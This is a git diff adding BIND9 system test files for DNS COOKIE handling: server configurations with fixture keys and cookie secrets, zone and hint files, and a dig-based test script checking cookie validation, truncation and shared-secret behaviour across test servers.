a/bin/tests/system/cookie/ns1/named.conf.in b/bin/tests/system/cookie/ns1/named.conf.in new file mode 100644 index 0000000..129a9b1 --- /dev/null +++ b/bin/tests/system/cookie/ns1/named.conf.in @@ -0,0 +1,60 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +key foo { + secret "aaaaaaaaaaaa"; + algorithm hmac-sha256; +}; + +server 10.53.0.10 { + keys foo; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1 dscp 1; + notify-source 10.53.0.1 dscp 2; + transfer-source 10.53.0.1 dscp 3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + deny-answer-addresses { 192.0.2.0/24; 2001:db8:beef::/48; } + except-from { "example.org"; }; + deny-answer-aliases { "example.org"; } + except-from { "goodcname.example.net"; + "gooddname.example.net"; }; + allow-query {!10.53.0.8; any; }; + send-cookie yes; + nocookie-udp-size 512; +}; + +zone "." { + type hint; + file "root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; diff --git a/bin/tests/system/cookie/ns1/root.hint b/bin/tests/system/cookie/ns1/root.hint new file mode 100644 index 0000000..993227d --- /dev/null +++ b/bin/tests/system/cookie/ns1/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.2 diff --git a/bin/tests/system/cookie/ns2/named.conf.in b/bin/tests/system/cookie/ns2/named.conf.in new file mode 100644 index 0000000..ef08125 --- /dev/null +++ b/bin/tests/system/cookie/ns2/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2 dscp 1; + notify-source 10.53.0.2 dscp 2; + transfer-source 10.53.0.2 dscp 3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + send-cookie yes; + nocookie-udp-size 512; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/cookie/ns2/root.db b/bin/tests/system/cookie/ns2/root.db new file mode 100644 index 0000000..533ab88 --- /dev/null +++ b/bin/tests/system/cookie/ns2/root.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ SOA a.root-servers.nil. hostmaster.isc.org. 1 600 600 1200 600 +@ NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.2 +large.xxx TXT ( large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large ) +tld. NS ns.tld. +ns.tld A 10.53.0.9 +tsig. NS ns.tsig. +ns.tsig A 10.53.0.10 diff --git a/bin/tests/system/cookie/ns3/named.conf.in b/bin/tests/system/cookie/ns3/named.conf.in new file mode 100644 index 0000000..8b2ad79 --- /dev/null +++ b/bin/tests/system/cookie/ns3/named.conf.in @@ -0,0 +1,52 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3 dscp 1; + notify-source 10.53.0.3 dscp 2; + transfer-source 10.53.0.3 dscp 3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + deny-answer-addresses { 192.0.2.0/24; 2001:db8:beef::/48; } + except-from { "example.org"; }; + deny-answer-aliases { "example.org"; } + except-from { "goodcname.example.net"; + "gooddname.example.net"; }; + allow-query {!10.53.0.8; any; }; + send-cookie yes; + nocookie-udp-size 512; + require-server-cookie yes; +}; + +zone "." { + type hint; + file "root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; diff --git a/bin/tests/system/cookie/ns3/root.hint b/bin/tests/system/cookie/ns3/root.hint new file mode 100644 index 0000000..993227d --- /dev/null +++ b/bin/tests/system/cookie/ns3/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.2 diff --git a/bin/tests/system/cookie/ns4/named.conf.in b/bin/tests/system/cookie/ns4/named.conf.in new file mode 100644 index 0000000..0b14272 --- /dev/null +++ b/bin/tests/system/cookie/ns4/named.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + cookie-algorithm siphash24; + cookie-secret "569d36a6cc27d6bf55502183302ba352"; + require-server-cookie yes; +}; + +zone "." { + type hint; + file "root.hint"; +}; diff --git a/bin/tests/system/cookie/ns4/root.hint b/bin/tests/system/cookie/ns4/root.hint new file mode 100644 index 0000000..993227d --- /dev/null +++ b/bin/tests/system/cookie/ns4/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.2 diff --git a/bin/tests/system/cookie/ns5/named.conf.in b/bin/tests/system/cookie/ns5/named.conf.in new file mode 100644 index 0000000..2aabc5a --- /dev/null +++ b/bin/tests/system/cookie/ns5/named.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + cookie-algorithm siphash24; + cookie-secret "569d36a6cc27d6bf55502183302ba352"; + cookie-secret "6b300e27a0db46d4b046e4189790fa7d"; + require-server-cookie yes; +}; + +zone "." { + type hint; + file "root.hint"; +}; diff --git a/bin/tests/system/cookie/ns5/root.hint b/bin/tests/system/cookie/ns5/root.hint new file mode 100644 index 0000000..993227d --- /dev/null +++ b/bin/tests/system/cookie/ns5/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.2 diff --git a/bin/tests/system/cookie/ns6/named.conf.in b/bin/tests/system/cookie/ns6/named.conf.in new file mode 100644 index 0000000..2bf3793 --- /dev/null +++ b/bin/tests/system/cookie/ns6/named.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + cookie-algorithm siphash24; + cookie-secret "6b300e27a0db46d4b046e4189790fa7d"; + require-server-cookie yes; +}; + +zone "." { + type hint; + file "root.hint"; +}; diff --git a/bin/tests/system/cookie/ns6/root.hint b/bin/tests/system/cookie/ns6/root.hint new file mode 100644 index 0000000..993227d --- /dev/null +++ b/bin/tests/system/cookie/ns6/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.2 diff --git a/bin/tests/system/cookie/ns7/named.conf.in b/bin/tests/system/cookie/ns7/named.conf.in new file mode 100644 index 0000000..c9518ae --- /dev/null +++ b/bin/tests/system/cookie/ns7/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.7 dscp 1; + notify-source 10.53.0.7 dscp 2; + transfer-source 10.53.0.7 dscp 3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; + recursion no; + answer-cookie no; + send-cookie yes; + nocookie-udp-size 512; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/cookie/ns7/root.db b/bin/tests/system/cookie/ns7/root.db new file mode 100644 index 0000000..39a63da --- /dev/null +++ b/bin/tests/system/cookie/ns7/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ SOA a.root-servers.nil. hostmaster.isc.org. 1 600 600 1200 600 +@ NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.2 +large.xxx TXT ( large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large ) diff --git a/bin/tests/system/cookie/ns8/example.db b/bin/tests/system/cookie/ns8/example.db new file mode 100644 index 0000000..7fa64d6 --- /dev/null +++ b/bin/tests/system/cookie/ns8/example.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 SOA . . 0 0 0 0 0 +@ 3600 NS . diff --git a/bin/tests/system/cookie/ns8/named.conf.in b/bin/tests/system/cookie/ns8/named.conf.in new file mode 100644 index 0000000..1a9697b --- /dev/null +++ b/bin/tests/system/cookie/ns8/named.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.8 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.8; + notify-source 10.53.0.8; + transfer-source 10.53.0.8; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.8; }; + listen-on-v6 { none; }; + dnssec-validation yes; + rate-limit {}; + require-server-cookie yes; +}; + +zone "example" { + type primary; + file "example.db"; +}; diff --git a/bin/tests/system/cookie/prereq.sh b/bin/tests/system/cookie/prereq.sh new file mode 100644 index 0000000..ad8bbe3 --- /dev/null +++ b/bin/tests/system/cookie/prereq.sh @@ -0,0 +1,33 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +if test -n "$PYTHON" +then + if $PYTHON -c "import dns" 2> /dev/null + then + : + else + echo_i "This test requires the dnspython module." >&2 + exit 1 + fi +else + echo_i "This test requires Python and the dnspython module." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/cookie/setup.sh b/bin/tests/system/cookie/setup.sh new file mode 100644 index 0000000..c679d03 --- /dev/null +++ b/bin/tests/system/cookie/setup.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named.conf.in ns7/named.conf +copy_setports ns8/named.conf.in ns8/named.conf diff --git a/bin/tests/system/cookie/tests.sh b/bin/tests/system/cookie/tests.sh new file mode 100755 index 0000000..29ace6f --- /dev/null +++ b/bin/tests/system/cookie/tests.sh @@ -0,0 +1,515 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +getcookie() { + awk '$2 == "COOKIE:" { + print $3; + }' < $1 | tr -d '\r' +} + +fullcookie() { + awk 'BEGIN { n = 0 } + // { v[n++] = length(); } + END { print (v[1] == v[2]); }' +} + +havetc() { + grep 'flags:.* tc[^;]*;' $1 > /dev/null +} + +for bad in bad*.conf +do + n=`expr $n + 1` + echo_i "checking that named-checkconf detects error in $bad ($n)" + ret=0 + $CHECKCONF $bad > /dev/null 2>&1 && ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for good in good*.conf +do + n=`expr $n + 1` + echo_i "checking that named-checkconf detects accepts $good ($n)" + ret=0 + $CHECKCONF $good > /dev/null 2>&1 || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +n=`expr $n + 1` +echo_i "checking RCODE=FORMERR to query without question section and without COOKIE option ($n)" +ret=0 +$DIG $DIGOPTS +qr +header-only +nocookie version.bind txt ch @10.53.0.1 > dig.out.test$n +grep COOKIE: dig.out.test$n > /dev/null && ret=1 +grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RCODE=NOERROR to query without question section and with COOKIE option ($n)" +ret=0 +$DIG $DIGOPTS +qr +header-only +cookie version.bind txt ch @10.53.0.1 > dig.out.test$n +grep COOKIE: dig.out.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking COOKIE token is returned to empty COOKIE option ($n)" +ret=0 +$DIG $DIGOPTS +cookie version.bind txt ch @10.53.0.1 > dig.out.test$n +grep COOKIE: dig.out.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking COOKIE is not returned when answer-cookie is false ($n)" +ret=0 +$DIG $DIGOPTS +cookie version.bind txt ch @10.53.0.7 > dig.out.test$n +grep COOKIE: dig.out.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking response size without COOKIE ($n)" +ret=0 +$DIG $DIGOPTS large.example txt @10.53.0.1 +ignore > dig.out.test$n +havetc dig.out.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking response size without valid COOKIE ($n)" +ret=0 +$DIG $DIGOPTS +cookie large.example txt @10.53.0.1 +ignore > dig.out.test$n +havetc dig.out.test$n || ret=1 +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking response size with COOKIE ($n)" +ret=0 +$DIG $DIGOPTS +cookie large.example txt @10.53.0.1 > dig.out.test$n.l +cookie=`getcookie dig.out.test$n.l` +$DIG $DIGOPTS +qr +cookie=$cookie large.example txt @10.53.0.1 +ignore > dig.out.test$n +havetc dig.out.test$n && ret=1 +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking response size with COOKIE recursive ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie=$cookie large.xxx txt @10.53.0.1 +ignore > dig.out.test$n +havetc dig.out.test$n && ret=1 +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking COOKIE is learnt for TCP retry ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie large.example txt @10.53.0.1 > dig.out.test$n +linecount=`getcookie dig.out.test$n | wc -l` +if [ $linecount != 3 ]; then ret=1; fi +checkfull=`getcookie dig.out.test$n | fullcookie` +if [ $checkfull != 1 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking for COOKIE value in adb ($n)" +ret=0 +rndc_dumpdb ns1 +grep "10.53.0.2.*\[cookie=" ns1/named_dump.db.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking require-server-cookie default (no) ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie +nobadcookie soa @10.53.0.1 > dig.out.test$n +grep BADCOOKIE dig.out.test$n > /dev/null && ret=1 +linecount=`getcookie dig.out.test$n | wc -l` +if [ $linecount != 2 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking require-server-cookie yes ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie +nobadcookie soa @10.53.0.3 > dig.out.test$n +grep "flags: qr[^;]* aa[ ;]" dig.out.test$n > /dev/null && ret=1 +grep "flags: qr[^;]* ad[ ;]" dig.out.test$n > /dev/null && ret=1 +grep BADCOOKIE dig.out.test$n > /dev/null || ret=1 +linecount=`getcookie dig.out.test$n | wc -l` +if [ $linecount != 2 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking require-server-cookie yes with rate-limit ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie +nobadcookie soa example @10.53.0.8 > dig.out.test$n +grep "flags: qr[^;]* ad[ ;]" dig.out.test$n > /dev/null && ret=1 +grep BADCOOKIE dig.out.test$n > /dev/null || ret=1 +linecount=`getcookie dig.out.test$n | wc -l` +if [ $linecount != 2 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "send undersized cookie ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie=000000 soa @10.53.0.1 > dig.out.test$n || ret=1 +grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "send oversized for named cookie ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie=${cookie}00 soa @10.53.0.1 > dig.out.test$n || ret=1 +grep "COOKIE: [a-f0-9]* (good)" dig.out.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "send oversized for named cookie with server requiring a good cookie ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie=${cookie}00 soa @10.53.0.3 > dig.out.test$n || ret=1 +grep "COOKIE: [a-f0-9]* (good)" dig.out.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# +# Test shared cookie-secret support. +# +# NS4 has cookie-secret "569d36a6cc27d6bf55502183302ba352"; +# +# NS5 has cookie-secret "569d36a6cc27d6bf55502183302ba352"; +# NS5 has cookie-secret "6b300e27a0db46d4b046e4189790fa7d"; (alternate) +# +# NS6 has cookie-secret "6b300e27a0db46d4b046e4189790fa7d"; +# +# Server cookies from NS4 are accepted by NS5 and not NS6 +# Server cookies from NS5 are accepted by NS4 and not NS6 +# Server cookies from NS6 are accepted by NS5 and not NS4 +# +# Force local address so that the client's address is the same to all servers. +# + +n=`expr $n + 1` +echo_i "get NS4 cookie for cross server checking ($n)" +ret=0 +$DIG $DIGOPTS +cookie -b 10.53.0.4 soa . @10.53.0.4 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +ns4cookie=`getcookie dig.out.test$n` +test -n "$ns4cookie" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "get NS5 cookie for cross server checking ($n)" +ret=0 +$DIG $DIGOPTS +cookie -b 10.53.0.4 soa . @10.53.0.5 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +ns5cookie=`getcookie dig.out.test$n` +test -n "$ns5cookie" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "get NS6 cookie for cross server checking ($n)" +ret=0 +$DIG $DIGOPTS +cookie -b 10.53.0.4 soa . @10.53.0.6 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +ns6cookie=`getcookie dig.out.test$n` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test NS4 cookie on NS5 (expect success) ($n)" +ret=0 +$DIG $DIGOPTS +cookie=$ns4cookie -b 10.53.0.4 +nobadcookie soa . @10.53.0.5 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test NS4 cookie on NS6 (expect badcookie) ($n)" +ret=0 +$DIG $DIGOPTS +cookie=$ns4cookie -b 10.53.0.4 +nobadcookie soa . @10.53.0.6 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +grep "status: BADCOOKIE," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test NS5 cookie on NS4 (expect success) ($n)" +ret=0 +$DIG $DIGOPTS +cookie=$ns5cookie -b 10.53.0.4 +nobadcookie soa . @10.53.0.4 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test NS5 cookie on NS6 (expect badcookie) ($n)" +ret=0 +$DIG $DIGOPTS +cookie=$ns5cookie -b 10.53.0.4 +nobadcookie soa . @10.53.0.6 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +grep "status: BADCOOKIE," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test NS6 cookie on NS4 (expect badcookie) ($n)" +ret=0 +$DIG $DIGOPTS +cookie=$ns6cookie -b 10.53.0.4 +nobadcookie soa . @10.53.0.4 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +grep "status: BADCOOKIE," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test NS6 cookie on NS5 (expect success) ($n)" +ret=0 +$DIG $DIGOPTS +cookie=$ns6cookie -b 10.53.0.4 +nobadcookie soa . @10.53.0.5 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + 